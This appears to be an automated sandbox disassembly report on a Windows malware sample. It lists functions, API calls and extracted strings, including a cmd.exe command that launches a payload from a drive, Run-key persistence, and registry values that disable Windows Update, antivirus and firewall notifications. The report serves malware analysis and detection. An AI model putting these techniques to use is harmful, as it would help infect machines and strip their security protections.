Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstancewsprintf
String ID: $h@$%windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
API String ID: 2038452267-1952734972
Opcode ID: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
Instruction ID: ff343e69aad13d9306a4779b19c6e3e8efaa2fda419abce3ce5a22e1d679f985
Opcode Fuzzy Hash: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
Instruction Fuzzy Hash: 0631D975A40208EFCB04DF98D885EDEB7B5EF88704F108199E519A73A5CB74AE81CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4C1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
SysFreeString.OLEAUT32(00000000), ref: 0040E59F
SysFreeString.OLEAUT32(00000000), ref: 0040E5B7

Strings

device, xrefs: 0040E533
deviceType, xrefs: 0040E546

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
Instruction ID: 4edf041377c7e14b34ff85b7b029659f12f4b503add3d656b401b028ce93b30a
Opcode Fuzzy Hash: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
Instruction Fuzzy Hash: AB31DC70A0010AEFDB14CFD5DC84BAFB7B5AF48304F108969E515A7390E778EA45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040E361 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
SysFreeString.OLEAUT32(00000000), ref: 0040E43F
SysFreeString.OLEAUT32(00000000), ref: 0040E457

Strings

service, xrefs: 0040E3D3
serviceType, xrefs: 0040E3E6

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
Instruction ID: ed37c26d591e2f51ed35895ea84be071d11e51b9472e036d4bc20704c2c7b13d
Opcode Fuzzy Hash: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
Instruction Fuzzy Hash: 0E31EAB1A0020ADFCB04DF99D884FAFB7B5BF48304F108569E515B73A0D778AA85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004090F0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 004090FD
_aullshr.NTDLL ref: 0040910E
_allshl.NTDLL ref: 00409130
_aullshr.NTDLL ref: 0040914C
_allshl.NTDLL ref: 0040916E
_aullshr.NTDLL ref: 0040918A

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
Instruction ID: a69f75a9761dffb427665dfb7b283027f7726bbdceffba7061474d3de6b788b4
Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
Instruction Fuzzy Hash: 0B111F326005186B8B10EF5EC44268ABBD6EF84361B15C136FC2CDF35AD675D9414BD4

Uniqueness

Uniqueness Score: -1.00%

Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
InterlockedDecrement.KERNEL32(?), ref: 004018B1

Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
String ID:
API String ID: 3966618661-0
Opcode ID: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
Instruction ID: 99e37592b547e3d1ed5d588db8744cb94e6869326ec40c3cf91f75bef10dfbd8
Opcode Fuzzy Hash: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
Instruction Fuzzy Hash: CA41A175604B02ABC718DB39D848797F3A4BF84314F14827EE82D933D1E739A855CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00408CD0 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 00408CDE
_allshl.NTDLL ref: 00408CED
_allshl.NTDLL ref: 00408CFC
_allshl.NTDLL ref: 00408D0B
_allshl.NTDLL ref: 00408D1A

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: _allshl
String ID:
API String ID: 435966717-0
Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
Instruction ID: bcae3434c2129d449cda67bd59c491ccebf17daabcdef2e049336039ec6bac91
Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
Instruction Fuzzy Hash: 3EF03172901428AB9750EEFF85424CBF7E69F98365F218176F81CE3261E9709D0546F2

Uniqueness

Uniqueness Score: -1.00%

Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
WaitForSingleObject.KERNEL32(Function_00001100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
CloseHandle.KERNEL32(Function_00001100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C

Part of subcall function 0040A3F0: HeapFree.KERNEL32(021A0000,00000000,00402612,?,00402612,?), ref: 0040A44B

Strings

pdu, xrefs: 00401339

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CloseEventFreeHandleHeapObjectSingleWait
String ID: pdu
API String ID: 309973729-2320407122
Opcode ID: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
Instruction ID: d174ec339e303b727d6f690e0c81bd26c44cc0430c196550e953614590448db6
Opcode Fuzzy Hash: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
Instruction Fuzzy Hash: 0C01D6765003009BCB249F55ECC0D9B7769AF49311704467AFC05AB396C638E8508775

Uniqueness

Uniqueness Score: -1.00%

Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
WSAGetLastError.WS2_32 ref: 00401FB9
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
String ID:
API String ID: 2074799992-0
Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Recv$ErrorLastSleep
String ID:
API String ID: 3668019968-0
Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6

Uniqueness

Uniqueness Score: -1.00%

Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
WSAGetLastError.WS2_32 ref: 00401B12
Sleep.KERNEL32(00000001), ref: 00401B28
WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Send$ErrorLastSleep
String ID:
API String ID: 2121970615-0
Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79

Uniqueness

Uniqueness Score: -1.00%

Function 0040D650 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(021A0634), ref: 0040D669
CloseHandle.KERNEL32(021A0638), ref: 0040D698
LeaveCriticalSection.KERNEL32(021A0634), ref: 0040D6A7
DeleteCriticalSection.KERNEL32(021A0634), ref: 0040D6B4

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterHandleLeave
String ID:
API String ID: 3102160386-0
Opcode ID: 7bf4f18b4702a230417702d69d1d85fee5c3e33d7782737d8a2bd2494ce2794f
Instruction ID: fd906f08b3b88ca1f2a1246d33854d1cb2ade3c35c50db1fce3d72ba6cb97bf7
Opcode Fuzzy Hash: 7bf4f18b4702a230417702d69d1d85fee5c3e33d7782737d8a2bd2494ce2794f
Instruction Fuzzy Hash: 64115EB4D00208EBDB08DF94D984A9DB775FF44309F1085A9E80AA7341D739EE94DB85

Uniqueness

Uniqueness Score: -1.00%

Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: 998351d4031ac32c6d6d10c259f6772ab7bb4c14647e9de6e02c89c2d1c81f5d
Instruction ID: a0dc8c3c5f9b8335a8c68536f832427d4bfc411db9c79380583e721672fa548d
Opcode Fuzzy Hash: 998351d4031ac32c6d6d10c259f6772ab7bb4c14647e9de6e02c89c2d1c81f5d
Instruction Fuzzy Hash: 4F01F7792423009FC7209F26ED84A9B73E8AF45711F00043EE44693650DB39E401CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040DE00: memset.NTDLL ref: 0040DE28
Part of subcall function 0040DE00: InternetCrackUrlA.WININET(0040D8D9,00000000,10000000,0000003C), ref: 0040DE78
Part of subcall function 0040DE00: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DE88
Part of subcall function 0040DE00: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DEC1
Part of subcall function 0040DE00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DEF7
Part of subcall function 0040DE00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DF1F
Part of subcall function 0040DE00: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DF68
Part of subcall function 0040DE00: InternetCloseHandle.WININET(00000000), ref: 0040DFF7

Part of subcall function 0040DCF0: SysAllocString.OLEAUT32(00000000), ref: 0040DD1E
Part of subcall function 0040DCF0: CoCreateInstance.OLE32(00412738,00000000,00004401,00412728,00000000), ref: 0040DD46
Part of subcall function 0040DCF0: SysFreeString.OLEAUT32(00000000), ref: 0040DDE1

SysFreeString.OLEAUT32(00000000), ref: 0040DC9B
SysFreeString.OLEAUT32(00000000), ref: 0040DCA5

Strings

%S%S, xrefs: 0040DC86

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
String ID: %S%S
API String ID: 1017111014-3267608656
Opcode ID: e90815c1511221caa1bb4232c4d734c08bee98e5bb0896a31ce96f10b80c8380
Instruction ID: 028390a8fa3b683b7bf8b6e952c0b4b0066608931571745b54bc663e5df7610f
Opcode Fuzzy Hash: e90815c1511221caa1bb4232c4d734c08bee98e5bb0896a31ce96f10b80c8380
Instruction Fuzzy Hash: 4C415BB5E002099FDB04DBE4C885AEFB7B5BF48304F104529E605B7390D778AA45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004072E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,0000007C), ref: 00407306
Sleep.KERNEL32(000003E8), ref: 00407337

Strings

P~0, xrefs: 0040736C

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: P~0
API String ID: 3472027048-138063361
Opcode ID: 754d6f7678a9d22ca5b9d6cd3d671f9ed3892c2cd29b210122976304f2a72595
Instruction ID: 42fb3ef0a0ea9ce1f0c1cd41f2aa7e292651273a77fcc00f5b674e7b102c0273
Opcode Fuzzy Hash: 754d6f7678a9d22ca5b9d6cd3d671f9ed3892c2cd29b210122976304f2a72595
Instruction Fuzzy Hash: 62118F74E04208FBDB04CFA4D885BAE7B75AF41305F10C0AAED056B381D679BA90DB46

Uniqueness

Uniqueness Score: -1.00%

Function 00405E50 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00416C40,?,00000000,?), ref: 00405E5F
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
LeaveCriticalSection.KERNEL32(00416C40), ref: 00405F30

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CriticalSectionmemcpy$EnterLeave
String ID:
API String ID: 469056452-0
Opcode ID: 11253c93557e272cfa09b9ef5557470c866ee47475f0489080f61b160b652d5f
Instruction ID: d4c7a0d735d14698d69a5203b24d712139acd761569c954f121491256ddf65dc
Opcode Fuzzy Hash: 11253c93557e272cfa09b9ef5557470c866ee47475f0489080f61b160b652d5f
Instruction Fuzzy Hash: B8216B70A04208ABCB05DB94D885BDFB772EB44304F1481BAE84667281D67DAA85CF9A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sysvratrel.exePID: 5676, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1447
Total number of Limit Nodes:	1

Executed Functions

Function 004074D0 Relevance: 208.8, APIs: 78, Strings: 41, Instructions: 569
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 004074DE
CreateMutexA.KERNELBASE(00000000,00000000,ax765638x6xa), ref: 004074ED
GetLastError.KERNEL32 ref: 004074F9
ExitProcess.KERNEL32 ref: 00407508
GetModuleFileNameW.KERNEL32(00000000,00417280,00000105), ref: 00407542
PathFindFileNameW.SHLWAPI(00417280), ref: 0040754D
wsprintfW.USER32 ref: 0040756A
DeleteFileW.KERNEL32(?), ref: 0040757A
ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407591
wcscmp.NTDLL ref: 004075A3
ExitProcess.KERNEL32 ref: 004075C2

Strings

Windows Settings, xrefs: 00407668, 0040771B
WindowsUpdate, xrefs: 0040781E
AntiSpywareOverride, xrefs: 004079EF
SOFTWARE\Microsoft\Security Center\Svc, xrefs: 00407A98
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407635
%windir%, xrefs: 004075D4
%s\%s, xrefs: 0040769E
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 004078A2
FirewallDisableNotify, xrefs: 004079D0
NoAutoUpdate, xrefs: 004077C2
FirewallOverride, xrefs: 00407ABD
UpdatesDisableNotify, xrefs: 00407B77
AntiSpywareOverride, xrefs: 00407AFB
FirewallOverride, xrefs: 004079B1
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004076E8
UpdatesDisableNotify, xrefs: 00407A6B
Start, xrefs: 00407774
%s\tbtnds.dat, xrefs: 00407BCA
AntiVirusDisableNotify, xrefs: 00407A2D
AntiVirusOverride, xrefs: 00407A0E
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL, xrefs: 0040793E
ax765638x6xa, xrefs: 004074E4
SYSTEM\CurrentControlSet\Services\wuauserv, xrefs: 00407753
UpdatesOverride, xrefs: 00407B58
sysvratrel.exe, xrefs: 00407597, 004075DF, 00407692
SOFTWARE\Policies\Microsoft\Windows, xrefs: 004077F4
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate, xrefs: 0040784B
AntiVirusDisableNotify, xrefs: 00407B39
SYSTEM\CurrentControlSet\Services\BITS, xrefs: 004078F0
CheckedValue, xrefs: 0040795F
NoAutoUpdate, xrefs: 004078C3
UpdatesOverride, xrefs: 00407A4C
FirewallDisableNotify, xrefs: 00407ADC
%s\%s, xrefs: 004075EB
%s:Zone.Identifier, xrefs: 0040755E
Start, xrefs: 00407911
%userprofile%, xrefs: 0040758C
%s\tbtcmds.dat, xrefs: 00407BE4
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 004077A1
AntiVirusOverride, xrefs: 00407B1A
SOFTWARE\Microsoft\Security Center, xrefs: 0040798C

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$CheckedValue$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$ax765638x6xa$sysvratrel.exe
API String ID: 4172876685-1985754541
Opcode ID: 02b0754e67c3a5fcf2013b17b005cb8467541e175cb8f0ff015428280e5330c7
Instruction ID: 01c652a6eea3614599500b2dbdc2b26867472a33c88adbc755e5585b16fefd61
